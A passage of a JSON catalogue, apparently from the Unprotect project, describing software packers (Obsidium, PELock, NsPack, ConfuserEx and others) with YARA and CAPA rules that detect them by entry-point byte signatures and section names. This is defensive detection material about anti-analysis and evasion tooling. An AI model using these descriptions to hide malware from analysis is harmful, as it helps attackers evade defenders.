34 CA E8 29 00 00 00 EB 02 C1 81 EB 01 3A 8B 54 24 0C EB 02 32 92 83 82 B8 00 00 00 22 EB 02 F2 7F 33 C0 EB 04 65 7E 14 79 C3 EB 04 05 AD 7F 45 EB 04 05 65 0B E8 64 67 FF 36 00 00 EB 04 0D F6 A8 7F 64 67 89 26 00 00 EB 04 8D 68 C7 FB EB 01 6B }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v10059_Final: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 AF }\r\n        $b = { E8 AB 1C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v1304_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 }\r\n        $b = { EB 02 ?? ?? E8 25 00 00 00 EB 04 ?? ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 FF 36 00 00 EB 03 ?? ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 01 ?? 33 C0 EB 01 ?? 8B 00 EB 01 ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 02 ?? ?? E8 D5 FF FF FF EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 58 EB 02 ?? ?? EB 04 ?? ?? ?? ?? 64 67 8F 06 00 00 EB 03 ?? ?? ?? 83 C4 04 EB 01 ?? E8 3B 26 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_v1331_Obsidium_Software_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 04 ?? ?? ?? ?? E8 2A 00 00 00 EB 03 ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 26 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 02 ?? ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 01 ?? 50 EB 04 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_V1311_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 02 ?? ?? EB 03 ?? ?? ?? 8B 54 24 0C EB 01 ?? 83 82 B8 00 00 00 22 EB 04 ?? ?? ?? ?? 33 C0 EB 01 ?? C3 EB 02 ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 03 ?? ?? ?? 50 EB 03 ?? ?? ?? 33 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_v1250_Obsidium_Software_: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 0D 33 C0 C3 64 67 FF 36 00 00 64 67 89 26 00 00 50 33 C0 8B 00 C3 E9 FA 00 00 00 E8 D5 FF FF FF 58 64 67 8F 06 00 00 83 C4 04 E8 2B 13 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1337_20070623_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB 01 ?? 8B 00 EB 04 ?? ?? ?? ?? C3 EB 02 ?? ?? E9 FA 00 00 00 EB 04 ?? ?? ?? ?? E8 D5 FF FF FF EB 01 ?? EB 01 ?? 58 EB 04 ?? ?? ?? ?? EB 01 ?? 64 67 8F 06 00 00 EB 02 ?? ?? 83 C4 04 EB 01 ?? E8 F7 26 00 00 }\r\n        $b = { EB 02 ?? ?? E8 27 00 00 00 EB 03 ?? ?? ?? EB 01 ?? 8B 54 24 0C EB 03 ?? ?? ?? 83 82 B8 00 00 00 23 EB 03 ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 01 ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 01 ?? EB 01 ?? 50 EB 02 ?? ?? 33 C0 EB }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule Obsidium_V1342_Obsidium_Softwarenbsp_nbsp_SignByfly_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 ?? ?? E8 2C 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 02 ?? ?? 83 82 B8 00 00 00 27 EB 04 ?? ?? ?? ?? 33 C0 EB 02 ?? ?? C3 EB 02 ?? ?? EB 03 ?? ?? ?? 64 67 FF 36 00 00 EB 04 ?? ?? ?? ?? 64 67 89 26 00 00 EB 03 ?? ?? ?? EB 01 ?? 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_1250_Obsidium_Software: PEiD\r\n{\r\n    strings:\r\n        $a = { E8 0E 00 00 00 8B 54 24 0C 83 82 B8 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Obsidium_13021_Obsidium_Software_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 ?? ?? ?? E8 2E 00 00 00 EB 04 ?? ?? ?? ?? EB 04 ?? ?? ?? ?? 8B 54 24 0C EB 04 ?? ?? ?? ?? 83 82 B8 00 00 00 23 EB 01 ?? 33 C0 EB 04 ?? ?? ?? ?? C3 EB 03 ?? ?? ?? EB 02 ?? ?? 64 67 FF 36 00 00 EB 01 ?? 64 67 89 26 00 00 EB 02 ?? ?? EB 02 ?? ?? 50 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 201,
            "unprotect_id": "U1420",
            "name": "AxProtector",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "AxProtector encrypts the complete software you aim to protect, and shields it with a security shell, AxEngine. Best-of-breed anti-debugging and anti-disassembly methods are then injected into your software.",
            "resources": "https://www.wibu.com/us/products/protection-suite/axprotector.html",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 200,
            "unprotect_id": "U1419",
            "name": "PELock",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "PELock is a software security solution designed for the protection of any 32 bit Windows applications against cracking, tampering and reverse engineering analysis.",
            "resources": "https://www.pelock.com/products/pelock",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 114,
                    "key": "yara_detect_pelock",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_Pelock",
                    "rule": "rule Pelock_10x: PEiD\r\n{\r\n    strings:\r\n        $a = { 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 4B 45 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCKnt_204: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCKnt_204_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 CD 20 C7 1E EB 03 CD 20 EA 9C EB 02 EB 01 EB 01 EB 60 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCknt_201: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 CD 20 EB EB 01 EB 1E EB 01 EB EB 02 CD 20 9C EB 03 CD 20 EB 60 EB 03 CD 20 03 E8 03 00 00 00 E9 EB 04 58 40 50 C3 EB 04 CD EB 03 CD EB 02 CD 20 EB 03 CD 20 EA FC EB 03 CD 20 69 E8 00 00 00 00 EB 02 EB 01 EB 01 EB 5E EB 03 CD 20 EB EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCknt_203: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 C7 85 1E EB 03 CD 20 C7 9C EB 02 69 B1 60 EB 02 EB 01 EB 01 EB E8 03 00 00 00 E9 EB 04 58 40 50 C3 EB 01 EB EB 02 CD 20 EB 03 CD 20 EB FC EB 02 C7 85 E8 00 00 00 00 EB 03 CD 20 EA 5E EB 03 CD 20 69 0F 01 4E F4 EB 03 CD 20 EB EB 01 EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule PELOCknt_202: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 02 C7 85 1E EB 03 CD 20 EB EB 01 EB 9C EB 01 EB EB 02 CD 20 60 EB 03 CD 20 EB E8 03 00 00 00 E9 EB 04 58 40 50 C3 EB 04 CD 20 EB 02 EB 02 CD 20 EB 03 CD 20 EA FC EB 03 CD 20 69 E8 00 00 00 00 EB 02 EB 01 EB 01 EB 5E EB 02 CD 20 0F 01 4E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
                }
            ]
        },
        {
            "id": 199,
            "unprotect_id": "U1418",
            "name": "hXOR Packer",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.\r\n\r\nThe unpacker will decompress and decrypt the packed PE and execute it directly from memory without needing any hard disk space to execute.",
            "resources": "https://github.com/fscene8/hXOR-Packer",
            "tags": "",
            "snippets": [],
            "detection_rules": []
        },
        {
            "id": 198,
            "unprotect_id": "U1417",
            "name": "ConfuserEx",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "ConfuserEx is a open-source protector for .NET applications. It is the successor of Confuser project.\r\n\r\n- Supports .NET Framework 2.0/3.0/3.5/4.0/4.5/4.6/4.7/4.8\r\n\r\n- Symbol renaming (Support WPF/BAML)\r\n\r\n- Protection against debuggers/profilers\r\n\r\n- Protection against memory dumping\r\n\r\n- Protection against tampering (method encryption)\r\n\r\n- Control flow obfuscation\r\n\r\n- Constant/resources encryption\r\n\r\n- Reference hiding proxies\r\n\r\n- Disable decompilers\r\n\r\n- Embedding dependency\r\n\r\n- Compressing output",
            "resources": "https://github.com/mkaring/ConfuserEx",
            "tags": "",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 101,
                    "key": "capa_detect_confuser",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_Confuser",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with Confuser\r\n    namespace: anti-analysis/packer/confuser\r\n    authors:\r\n      - william.ballenthin@mandiant.com\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing::Confuser [F0001.009]\r\n    examples:\r\n      - b9f5bd514485fb06da39beff051b9fdc\r\n  features:\r\n    - or:\r\n      - string: \"ConfusedByAttribute\""
                }
            ]
        },
        {
            "id": 197,
            "unprotect_id": "U1416",
            "name": "NsPack",
            "categories": [
                {
                    "id": 12,
                    "key": "packers",
                    "label": "Packers"
                }
            ],
            "description": "NsPack is a packer for 32bits and 64bits exe, dll, ocx, scr Windows program.",
            "resources": "https://www.sans.org/white-papers/33428/",
            "tags": "NsPack",
            "snippets": [],
            "detection_rules": [
                {
                    "id": 96,
                    "key": "capa_detect_nspack",
                    "type": {
                        "id": 2,
                        "name": "CAPA",
                        "syntax_lang": "yaml"
                    },
                    "name": "CAPA_Detect_NSpack",
                    "rule": "rule:\r\n  meta:\r\n    name: packed with nspack\r\n    namespace: anti-analysis/packer/nspack\r\n    authors:\r\n      - \"@_re_fox\"\r\n    scope: file\r\n    att&ck:\r\n      - Defense Evasion::Obfuscated Files or Information::Software Packing [T1027.002]\r\n    mbc:\r\n      - Anti-Static Analysis::Software Packing [F0001]\r\n    references:\r\n      - https://www.hexacorn.com/blog/2016/12/15/pe-section-names-re-visited/\r\n    examples:\r\n      - 02179f3ba93663074740b5c0d283bae2\r\n  features:\r\n    - or:\r\n      - section: .nsp0\r\n      - section: .nsp1\r\n      - section: .nsp2"
                },
                {
                    "id": 113,
                    "key": "yara_detect_nspack",
                    "type": {
                        "id": 1,
                        "name": "YARA",
                        "syntax_lang": "YARA"
                    },
                    "name": "YARA_Detect_nspack",
                    "rule": "rule NsPacK_V33_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 BD ?? ?? ?? ?? 01 AD 54 3A 40 ?? FF B5 50 3A 40 ?? 6A 40 FF 95 88 3A 40 ?? 50 50 2D ?? ?? ?? ?? 89 85 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_30_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 ?? ?? FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V31_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V30_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? E9 ?? ?? E8 ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_34_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF 80 38 01 0F 84 42 02 00 00 C6 00 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF 80 38 01 0F 84 42 02 00 00 C6 00 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPack_V14_LiuXingPing_: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B1 85 40 00 2D AA 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V25_V26_NsPacK_Private: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_29_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8A 06 3C 00 74 12 8B F5 8D B5 ?? ?? FF FF 8A 06 3C 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8A 06 3C 00 74 12 8B F5 8D B5 ?? ?? FF FF 8A 06 3C 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPack_v37_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 8D ?? ?? ?? FF 80 39 01 0F 84 42 02 00 00 C6 01 01 8B C5 2B 85 ?? ?? ?? FF 89 85 ?? ?? ?? FF 01 85 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 01 06 55 56 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? ?? FF 85 C0 0F 84 69 03 00 00 89 85 ?? ?? ?? FF E8 00 00 00 00 5B B9 67 03 00 00 03 D9 50 53 E8 B0 02 00 00 5E 5D 8B 36 8B FD 03 BD ?? ?? ?? FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 34 01 13 8B 33 03 7B 04 57 51 53 FF B5 ?? ?? ?? FF FF B5 ?? ?? ?? FF 8B D6 8B CF 8B 85 ?? ?? ?? FF 05 AA 05 00 00 FF D0 5B 59 5F 83 F9 00 74 05 83 C3 08 EB C7 68 00 80 00 00 6A 00 FF B5 ?? ?? ?? FF FF 95 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 00 74 14 8A 1A 38 1F 75 E9 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 EB 0A 8A 5F 04 86 C4 C1 C0 10 86 C4 2B C7 03 C6 89 07 83 C7 05 80 EB E8 8B C3 E2 C6 E8 3A 01 00 00 8D 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v31_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 68 00 80 00 00 6A 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPacK_V36_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 83 38 01 0F 84 47 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_by_North_Star_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V27_V35_NsPacK_Private_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 54 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v23_North_Star_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_Liuxingping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 ?? ?? 40 00 2D ?? ?? 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v37_North_Star_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 8D ?? ?? ?? FF 80 39 01 0F 84 42 02 00 00 C6 01 01 8B C5 2B 85 ?? ?? ?? FF 89 85 ?? ?? ?? FF 01 85 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 01 06 55 56 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? ?? FF 85 C0 0F 84 69 03 00 00 89 85 ?? ?? ?? FF E8 00 00 00 00 5B B9 67 03 00 00 03 D9 50 53 E8 B0 02 00 00 5E 5D 8B 36 8B FD 03 BD ?? ?? ?? FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 34 01 13 8B 33 03 7B 04 57 51 53 FF B5 ?? ?? ?? FF FF B5 ?? ?? ?? FF 8B D6 8B CF 8B 85 ?? ?? ?? FF 05 AA 05 00 00 FF D0 5B 59 5F 83 F9 00 74 05 83 C3 08 EB C7 68 00 80 00 00 6A 00 FF B5 ?? ?? ?? FF FF 95 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 00 74 14 8A 1A 38 1F 75 E9 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 EB 0A 8A 5F 04 86 C4 C1 C0 10 86 C4 2B C7 03 C6 89 07 83 C7 05 80 EB E8 8B C3 E2 C6 E8 3A 01 00 00 8D 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_nSPack_13_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D3 FE FF FF 8B 06 83 F8 00 74 11 8D B5 DF FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_30_by_North_Star_Liu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 55 F9 FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 7D F9 FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 11 F9 FF FF 89 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_NsPacK_Private_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_nSPack_13_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D3 FE FF FF 8B 06 83 F8 00 74 11 8D B5 DF FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_by_North_Star_Liu_Xing_Ping_: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V36_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 83 38 01 0F 84 47 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_North_Star_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 